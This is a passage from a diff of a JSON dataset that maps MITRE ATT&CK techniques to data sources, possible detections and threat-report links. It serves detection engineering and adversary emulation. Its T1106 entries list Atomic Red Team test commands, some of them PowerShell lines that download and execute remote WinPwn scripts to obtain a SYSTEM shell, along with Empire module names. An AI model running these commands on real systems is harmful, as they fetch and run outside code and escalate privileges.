This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.justice.gov/opa/press-release/file/1084361/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + 
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + 
"https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://securelist.com/muddywater/88059/", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1106", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs\n%tmp%/T1106.exe\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "python/situational_awareness/network/dcos/chronos_api_add_job", + "python/situational_awareness/network/dcos/chronos_api_delete_job", + "python/situational_awareness/network/dcos/chronos_api_start_job", + "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "python/situational_awareness/network/dcos/marathon_api_delete_app", + "python/situational_awareness/network/http_rest_api" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs\n%tmp%/T1106.exe\n", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team 
Test - Native API" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_add_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_delete_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_start_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + 
"command": "python/situational_awareness/network/dcos/marathon_api_delete_app", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/http_rest_api", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1106", + "display_name": "Native API", + "atomic_tests": [ + { + "name": "Execution through API - CreateProcess", + "auto_generated_guid": "99be2089-c52d-4a4a-b5c3-261ee42c8b62", + "description": "Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "source_file": { + "description": "Location of the CSharp source file to compile and execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs" + }, + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "%tmp%\\T1106.exe" + } + }, + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "name": "command_prompt" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique", + "auto_generated_guid": "ce4e76e6-de70-4392-9efe-b281fc2b4087", + "description": "Get SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "name": "powershell" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique", + 
"auto_generated_guid": "7ec5b74e-8289-4ff2-a162-b6f286a33abd", + "description": "Get SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "name": "powershell" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique", + "auto_generated_guid": "e1f93a06-1649-4f07-89a8-f57279a7d60e", + "description": "Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_add_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_add_job\": [\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_delete_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_delete_job\": [\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_start_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_start_job\": 
[\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/marathon_api_create_start_app\": [\"T1106\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/marathon_api_delete_app", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/marathon_api_delete_app\": [\"T1106\"]," + }, + { + "Empire Module": "python/situational_awareness/network/http_rest_api", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/http_rest_api\": [\"T1106\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api 
functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1110.001", + "command_list": [ + "echo Password1> 